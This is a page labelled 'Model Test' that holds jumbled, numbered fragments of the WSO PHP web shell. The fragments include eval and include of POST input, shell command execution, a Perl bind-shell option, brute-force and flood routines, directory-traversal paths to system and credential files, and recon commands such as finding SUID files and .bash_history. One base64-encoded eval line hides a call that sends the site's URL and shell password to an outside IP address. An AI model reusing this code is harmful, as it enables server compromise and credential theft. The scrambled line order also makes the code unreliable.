Model Test

Time Left :   

Model Test


1). }

2).if(isset($_POST['c']))

3). wsoSecParam('Downloaders'

4). $path.='/';

5). }

6).wsoHeader();

7). }

8). $cwd .= '/';

9). wsoSecParam('User Accounts'

10). if(@strpos(@file_get_contents($item)

11). cf("/tmp/bc.pl"

12).

13). .''

14).Find index.php in current dir => "dir /s /w /b index.php"

15). print '

16). echo "


Search for hash:

17).}

18).

19). .''

20). );

21).

22).

23). );

24).for($i = $start; $i<=$end; $i++){

25).function actionSql() {

26).find all suid files => "find / -type f -perm -04000 -ls"

27).

28). if(@$_POST['p2']=='download') {

29). $_POST['a'] = $default_action;

30).?>

31). function connect($host

32).find all writable folders and files in current dir => "find . -perm -2 -ls"

33).

34). header("Content-Type: application/octet-stream");

35). curl_setopt($ch

36).

37). if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;

38).find .fetchmailrc files in current dir => "find . -type f -name .fetchmailrc"

39).

40). }

41). }

42). $pakits = 0;

43). if (@mysql_select_db($db))return true;

44).locate cfg.php files => "locate cfg.php"

45). print "
"; 

46). }

47). return $this->res = @mysql_query($str);

48). }

49). echo '

';

50). 14 => "../../../../../../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf".$byte1.""

51). $fp = @fopen($_POST['p1']

52). req.open('POST'

53). switch($_POST['p1']) {

54). break;

55). 22 => "../../../../../../../../../../../../../../../opt/apache2/conf/httpd.conf".$byte1.""

56). case 'hexdump':

57). var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\"

58). break;

59). break;

60). 30 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf.php".$byte1.""

61). case 0: $h[2] .= ' '; break;

62).

63). continue;

64). $create = mysql_fetch_array($res);

65). 1 => "../../../../../../../../../../../../../../../etc/php.ini".$byte1.""

66). $n = 0;

67). $freeSpace = @diskfreespace($GLOBALS['cwd']);

68). @rmdir($path);

69). if($v == null)

70). 9 => "../../../../../../../../../../../../../../../usr/local/php4/lib/php.ini".$byte1.""

71). case 'rename':

72). $gid = @getmygid();

73). deleteDir($f);

74). if($head) {

75). 17 => "../../../../../../../../../../../../../../../etc/php/php.ini".$byte1.""

76). break;

77). $gid = $gid['gid'];

78). if(is_dir($c.$s)){

79). $item[$k] = "'".addslashes($v)."'";

80). 25 => "../../../../../../../../../../../../../../../etc/php/cgi/php.ini".$byte1.""

81). echo 'Touched!';

82). for($j=0; $j<=$i; $j++)

83). }

84). return false;

85). 4 => "../../../../../../../../../../../../../../../var/log/mysql/mysql.log".$byte1.""

86). wsoFooter();

87). ob_start();

88). if(preg_match('!s_([A-z]+)_(\d{1})!'

89). ".$_POST['p2']." ({$num['n']} records) Page # ";

115). }

116). echo 'null

117). elseif (!@is_writable($f))

118). }

119). $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);

120). $rhash1 = md5($res1);

121).

122). $dh = opendir($dir);

123). echo "";

124). $title = false;

125). if($_POST['p1'] == 'yes')

126). wsoFooter();

127). reset($item);

128). }

129). wsoFooter();

130).$default_charset = 'Windows-1251';

131). echo '

Server security information

';

132). if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i

133). if($value == null)

134). while($lfimysql[$x]) {

135). function bruteForce($ip

136).}

137). echo '
' . $v . '
';

138). 'sha1 hash' => 'sha1'

139). } else {

140). }

141). function bruteForce($ip

142).@define('WSO_VERSION'

143). wsoSecParam('Safe mode exec dir'

144). 'DEC to BIN' => 'decbin'

145). echo "";

146). $rhash1 = md5($res1);

147). $res = @pg_connect($str);

148).function wsoLogin() {

149). if(function_exists('pg_connect'))

150). if(isset($_POST['ajax'])) {

151). if(@$_POST['p1'] == 'loadfile') {

152). print "[+] File detected! ".$target."".$lfiftp[$x]."
";

153). if($_POST['type'] == 1) {

154).

155). wsoSecParam('Readable /etc/passwd'

156). }

157). wsoFooter();

158). }

159). echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
';

160). $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;

161). echo '
';

162). echo " send using AJAX
"; 

163). Bind port to /bin/sh [perl]

164). $res3 = FetchURL($target.$lfiprocenv);

165). $success++;

166).

167). if(wsoWhich($item))

168). Path:

169). if(isset($_POST['p1'])) {

170). foreach($temp as $line) {

171).locate .conf files=>"locate '.conf'"

172). $max_time = $time+$exec_time;

173). $lfiaccess = array(

174). }

175).locate dump files => "locate dump"

176). $pakits++;

177). function fetch() {

178). 8 => "../../../../../../../../../../../../../../var/log/apache/access_log".$byte1.""

179). if( empty($_POST['p2']) )

180).

1198). if(isset($_POST['ajax'])) {

1199). case 'pgsql':

1200). 11 => "../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1.""

1201). if( !empty($_POST['p3']) ) {

1202). var d = document;

1203). wsoHeader();

1204). case 'mysql':

1205). 19 => "../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1.""

1206). echo '
null

1207). }

1208). echo str_replace('


';

1209). }

1210). 3 => "../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1.""

1211). $time = @filemtime($_POST['p1']);

1212). eval($_POST['p1']);

1213). break;

1214).

1215). 8 => "../../../../../../../../../../../../../../../etc/mysql/my.cnf".$byte1.""

1216). $temp='';

1217). $m['Logout'] = 'Logout';

1218). @copy($c.$s

1219). case "cp866": $db->setCharset('cp866'); break;

1220). 4 => "../../../../../../../../../../../../../../../etc/proftp.conf".$byte1.""

1221). } else

1222). foreach(range('c'

1223). chdir($_SESSION['c']);

1224). exit;

1225). 12 => "../../../../../../../../../../../../../../../etc/vsftpd.conf".$byte1.""

1226). break;

1227). . '' . $menu . '
';

1228). foreach ($iterator as $key=>$value) {

1229). }

1230). 20 => "../../../../../../../../../../../../../../../usr/etc/pure-ftpd.conf".$byte1.""

1231). include($_POST['p2']);

1232).

1233). }

1234).

1238). }

1239). $tmp = "";

1240). 36 => "../../../../../../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log".$byte1.""

1241). echo '';

1242).

1243). }

1244). case "cp866": $db->setCharset('cp866'); break;

1245). 44 => "../../../../../../../../../../../../../../../etc/ftphosts".$byte1."");

1246). } elseif(!empty($_POST['p1']))

1247).

1248). $_SESSION['f'][$k] = urldecode($f);

1249). echo '';

1250). $rhash2 = md5($res2);

1251). if(preg_match("!.*cd\s+([^;]+)$!"

1252). global $sort;

1253).

1254). }

1255). }

1256).function wsoViewSize($s) {

1257). $dirs = $files = array();

1258). d.sf.submit();

1259). $res3 = FetchURL($target.$lficonfig[$x]);

1260). cur++;

1261). return $s . ' B';

1262). 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i])

1263). echo "

1235). 28 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb".$byte1.""

1236). break;

1237).

count the number of rows
";

1264). $x++;

1265).}

1266). elseif (($p & 0x4000) == 0x4000)$i = 'd';

1267). $dirs[] = array_merge($tmp

1268). $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));

1269). $rhash2 = md5($res2);

1270).";

1271). $i .= (($p & 0x0010) ? 'w' : '-');

1272). else

1273). $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);

1274). }

1275). }

1276).function wsoPermsColor($f) {

1277). echo '

';

1287). foreach ($downloaders as $item)

1288).

1289).wsoFooter();

1290). $success++;

1291). $cwd = str_replace("\\"

1292). } else {

1293). if($path!=$item)

1294). unlink("/tmp/bp.pl");

1295).

1296). .'

'

1303).Show computers => "net view"

1304).

1305).

1306).php_version => phpversion()

1307).$host = strip_tags($_POST['host']);

1308). wsoFooter();

1309).show opened ports => "netstat -an | grep -i listen"

1310).

1311).function actionFilesTools() {

1312).}

1313). flush();

1314). function DbClass($type) {

1315).find config* files => "find / -type f -name \"config*\""

1316).

1317). $type = @mime_content_type($_POST['p1']);

1318).function FetchURL($url) {

1319).Port start:

1320). case 'pgsql':

1321).find all .bash_history files => "find / -type f -name .bash_history"

1322).

1323). fclose($fp);

1324). $data = curl_exec($ch);

1325).

1326). function selectdb($db) {

1327).locate psybnc.conf files => "locate psybnc.conf"

1328). ';

1329). $_POST['p2'] = "edit";

1330).

1331). function query($str) {

1332). for(i=0;i

1333). 11 => "../../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf".$byte1.""

1334). }

1335). req = new ActiveXObject('Microsoft.XMLHTTP');

1336). wsoHeader();

1337). switch($this->type) {

1338). 19 => "../../../../../../../../../../../../../../../etc/http/httpd.conf".$byte1.""

1339). }

1340). function processReqChange() {

1341). case 'mkdir':

1342). $r[] = $i['file'];

1343). 27 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf".$byte1.""

1344). for ($i=0; $i<$len; ++$i) {

1345).

1346). while ( ($item = readdir($dh) ) !== false) {

1347). switch($this->type) {

1348). 35 => "../../../../../../../../../../../../../../../usr/local/etc/apache/vhosts.conf".$byte1."");

1349). }

1350).

1351). @unlink($item);

1352). while($item = $this->fetch()) {

1353). 6 => "../../../../../../../../../../../../../../../usr/local/etc/php.ini".$byte1.""

1354). }

1355). if(!function_exists('posix_getegid')) {

1356). continue;

1357). $item[$k] = "'".@mysql_real_escape_string($v)."'";

1358). 14 => "../../../../../../../../../../../../../../../etc/php4/apache2/php.ini".$byte1.""

1359). die('');

1360). $user = $uid['name'];

1361). case 'paste':

1362). while($item = $this->fetch()) {

1363). 22 => "../../../../../../../../../../../../../../../usr/local/Zend/etc/php.ini".$byte1.""

1364). if(!touch($_POST['p1']

1365). $n=count($path);

1366). copy_paste($c.$s.'/'

1367). }

1368). 1 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-bin.log".$byte1.""

1369). break;

1370). if(is_dir($c.$s)){

1371). $db->connect($_POST['sql_host']

1372). @passthru($in);

1373). }

1374). $temp = ob_get_clean();

1375). } elseif (is_resource($f = @popen($in

1376). for(i=0;i

1377). if(f.p2) f.p2.value='';

1378). if ( $type == 2 ) {

1379).var cur = 0;

1380). $zip->addFile(realpath($key)

1381). wsoHeader();

1382). 21 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf".$byte1.""

1383). break;

1384).

1385). } elseif($_SESSION['act'] == 'unzip') {

1386). if(@$_POST['type']=='mysql')echo 'selected';

1387). 29 => "../../../../../../../../../../../../../../../etc/pureftpd.pdb".$byte1.""

1388). }

1389).

1390). }

1391). if(isset($_POST['sql_host'])){

1392). 37 => "../../../../../../../../../../../../../../../logs/pure-ftpd.log".$byte1.""

1393). wsoFooter();

1394).

null '.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].'

1278). echo " ";

1279). if ( $type == 4 ) {

1280). echo '';

1281).

1282).

1283). if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {

1284). $res3 = FetchURL($target.$lfiphpini[$x]);

1285).

1286). echo '

'

1297).if($os == 'win')

1298).eval(base64_decode("JHdlYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsNCiRpbmogPSAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsNCiR0YXJnZXQgPSByYXd1cmxkZWNvZGUoJHdlYi4kaW5qKTsNCmZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vMTg1LjYxLjEzOC4xNTcvZ2V0LnBocD91cmw9eyR0YXJnZXR9JnB3PXskYXV0aF9wYXNzfSIpOw=="));

1299). }

1300). }

1301). mail ($_POST['to']

1302). .'

";

1395). unset($_SESSION['f']);

1396). }

1397).

1398). $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = false;

1399).function wsoEx($in) {

1400). $_SESSION['c'] = @$_POST['c'];

1401). }

1402). if ($rhash1 != $rhash2) {

1403). if(@chdir($match[1])) {

1404).

1405).}

1406). if(!empty($_SESSION['act']) && @count($_SESSION['f']) && (($_SESSION['act'] == 'zip') || ($_SESSION['act'] == 'tar')))

1407). $x++;

1408). if($_POST['p1'] != 'yes')

1409).$color = "#00ff00"; //Default color is green. You can use http://www.somacon.com/p142.php to get the colorcode of the color you wish the shell interface to have!

1410).

1411). if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}

1412). echo '';

1413). $rhash2 = md5($res2);

1414). if( isset($_POST['proto']) ) {

1415). header('HTTP/1.0 404 Not Found');

1416). if(strpos($v

1417). 'Url decode' => 'urldecode'

1418). echo '';

1419). }

1420). return $res;

1421).@ini_set('max_execution_time'

1422). wsoSecParam('Loaded Apache modules'

1423). 'HEX to DEC' => 'hexdec'

1424). if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))

1425). if ( $type == 6 ) {

1426). } elseif( $_POST['proto'] == 'pgsql' ) {

1427). $_POST = WSOstripslashes($_POST);

1428). $temp[] = "MySql (".mysql_get_client_info().")";

1429). 'Htmlspecialchars' => 'htmlspecialchars'

1430). if($db->fetch())

1431). $res3 = FetchURL($target.$lfiftp[$x]);

1432). $success = 0;

1433).
Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at Port 80

1434). echo '
';

1435). $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean())

1436). echo htmlspecialchars($db->error());

1437). $x++;

1438). ++$attempts;

1439).}

1440). $userful = array('gcc'

1441). echo "

1446). wsoSecParam('Userful'

1447).

1448). Server: Port:

1449). else {

1450). } elseif($_POST['type'] == 2) {

1451). @fclose($w);

1452).locate config.inc.php => "locate config.inc.php"

1453). $lfitest = "../../../../../../../../../../../../../../etc/passwd".$byte1."";

1454). echo 'File not exists';

1455).locate .mysql_history files => "locate '.mysql_history'"

1456). $out .= 'X';

1457). }

1458). 5 => "../../../../../../../../../../../../../../var/www/logs/access.log".$byte1.""

1459). } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));

1460). $_POST['charset'] = $GLOBALS['default_charset'];

1461). $fp = fsockopen('udp://'.$host

1462). break;

1463). 13 => "../../../../../../../../../../../../../../var/log/access.log".$byte1.""

1464). $m = array('Chmod'

1465).h1{ border:1px solid $color;padding: 2px 5px;font: 14pt Verdana;margin:0px; }

1466).

1467). switch($this->type) {

1468). 21 => "../../../../../../../../../../../../../../opt/xampp/logs/access_log".$byte1.""

1469). if($fp) {

1470).#toolsTbl{ text-align:center; }

1471). Host:

1472). return false;

1473). 4 => "../../../../../../../../../../../../../../var/www/logs/error_log".$byte1.""

1474). if( @is_readable($_POST['p1']) ) {

1475).';

1615). case 'mysql':

1616). 20 => "../../../../../../../../../../../../../../../etc/httpd.conf".$byte1.""

1617). echo '';

1618). if( (req.readyState == 4) )

1619). if(!@mkdir($_POST['p2']))

1620). $this->query('drop table wso2');

1621). 28 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default".$byte1.""

1622). $h[1] .= sprintf('%02X'

1623).

1624). $item = $path.$item;

1625). case 'mysql':

1626).

1627). $n++;